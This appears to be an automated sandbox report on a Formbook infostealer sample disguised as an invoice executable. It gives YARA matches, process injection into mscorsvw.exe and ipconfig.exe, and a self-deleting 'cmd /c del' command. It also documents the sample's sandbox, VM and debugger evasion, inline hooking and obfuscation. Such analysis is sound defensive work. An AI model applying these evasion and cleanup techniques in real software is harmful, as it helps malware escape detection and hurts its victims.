Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@5/3
Source: C:\Users\user\Desktop\PT300975-inv.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT300975-inv.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
Source: PT300975-inv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PT300975-inv.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\PT300975-inv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: PT300975-inv.exe ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Users\user\Desktop\PT300975-inv.exe 'C:\Users\user\Desktop\PT300975-inv.exe'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PT300975-inv.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\PT300975-inv.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: PT300975-inv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PT300975-inv.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: mscorsvw.exe, 00000002.00000002.385641930.00000000057DF000.00000040.00000001.sdmp, ipconfig.exe, 00000004.00000002.605193019.000000000355F000.00000040.00000001.sdmp
Source: Binary string: mscorsvw.pdb source: ipconfig.exe, 00000004.00000002.605597251.000000000396F000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: mscorsvw.exe, ipconfig.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE0B8C pushfd ; ret 0_2_02DE0B8D
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE3008 pushad ; iretd 0_2_02DE3011
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CEB5 push eax; ret 2_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CF6C push eax; ret 2_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CF02 push eax; ret 2_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CF0B push eax; ret 2_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0573D0D1 push ecx; ret 2_2_0573D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034BD0D1 push ecx; ret 4_2_034BD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009AD856 push esi; ret 4_2_009AD859
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACEB5 push eax; ret 4_2_009ACF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACF0B push eax; ret 4_2_009ACF72
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACF02 push eax; ret 4_2_009ACF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACF6C push eax; ret 4_2_009ACF72

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\PT300975-inv.exe File opened: C:\Users\user\Desktop\PT300975-inv.exe:Zone.Identifier read attributes | delete
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL!:ZONE.IDENTIFIER
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000009998E4 second address: 00000000009998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000999B5E second address: 0000000000999B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00409A90 rdtsc 2_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\PT300975-inv.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7128 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7144 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6584 Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 6584 Thread sleep time: -68000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4004 Thread sleep time: -70000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00409A90 rdtsc 2_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0040ACD0 LdrLoadDll, 2_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h] 2_2_0570C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h] 2_2_0570C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05707D50 mov eax, dword ptr fs:[00000030h] 2_2_05707D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05723D43 mov eax, dword ptr fs:[00000030h] 2_2_05723D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05763540 mov eax, dword ptr fs:[00000030h] 2_2_05763540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0576A537 mov eax, dword ptr fs:[00000030h] 2_2_0576A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AE539 mov eax, dword ptr fs:[00000030h] 2_2_057AE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h] 2_2_05714D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h] 2_2_05714D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h] 2_2_05714D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8D34 mov eax, dword ptr fs:[00000030h] 2_2_057B8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EAD30 mov eax, dword ptr fs:[00000030h] 2_2_056EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05798DF1 mov eax, dword ptr fs:[00000030h] 2_2_05798DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h] 2_2_056FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_057AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov ecx, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h] 2_2_05711DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057135A1 mov eax, dword ptr fs:[00000030h] 2_2_057135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h] 2_2_057B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h] 2_2_056E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h] 2_2_0571FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h] 2_2_05712581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570746D mov eax, dword ptr fs:[00000030h] 2_2_0570746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h] 2_2_0577C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A44B mov eax, dword ptr fs:[00000030h] 2_2_0571A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571BC2C mov eax, dword ptr fs:[00000030h] 2_2_0571BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h] 2_2_057B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h] 2_2_05766C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A14FB mov eax, dword ptr fs:[00000030h] 2_2_057A14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h] 2_2_05766CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8CD6 mov eax, dword ptr fs:[00000030h] 2_2_057B8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F849B mov eax, dword ptr fs:[00000030h] 2_2_056F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FFF60 mov eax, dword ptr fs:[00000030h] 2_2_056FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8F6A mov eax, dword ptr fs:[00000030h] 2_2_057B8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FEF40 mov eax, dword ptr fs:[00000030h] 2_2_056FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h] 2_2_056E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571E730 mov eax, dword ptr fs:[00000030h] 2_2_0571E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570F716 mov eax, dword ptr fs:[00000030h] 2_2_0570F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h] 2_2_0577FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B070D mov eax, dword ptr fs:[00000030h] 2_2_057B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h] 2_2_0571A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057237F5 mov eax, dword ptr fs:[00000030h] 2_2_057237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h] 2_2_05767794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F8794 mov eax, dword ptr fs:[00000030h] 2_2_056F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F766D mov eax, dword ptr fs:[00000030h] 2_2_056F766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h] 2_2_0570AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h] 2_2_057AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0579FE3F mov eax, dword ptr fs:[00000030h] 2_2_0579FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EE620 mov eax, dword ptr fs:[00000030h] 2_2_056EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h] 2_2_0571A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h] 2_2_056EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05718E00 mov eax, dword ptr fs:[00000030h] 2_2_05718E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1608 mov eax, dword ptr fs:[00000030h] 2_2_057A1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F76E2 mov eax, dword ptr fs:[00000030h] 2_2_056F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057116E0 mov ecx, dword ptr fs:[00000030h] 2_2_057116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8ED6 mov eax, dword ptr fs:[00000030h] 2_2_057B8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05728EC7 mov eax, dword ptr fs:[00000030h] 2_2_05728EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0579FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0579FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057136CC mov eax, dword ptr fs:[00000030h] 2_2_057136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057646A7 mov eax, dword ptr fs:[00000030h] 2_2_057646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_057B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577FE87 mov eax, dword ptr fs:[00000030h] 2_2_0577FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EC962 mov eax, dword ptr fs:[00000030h] 2_2_056EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h] 2_2_056EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h] 2_2_0570B944
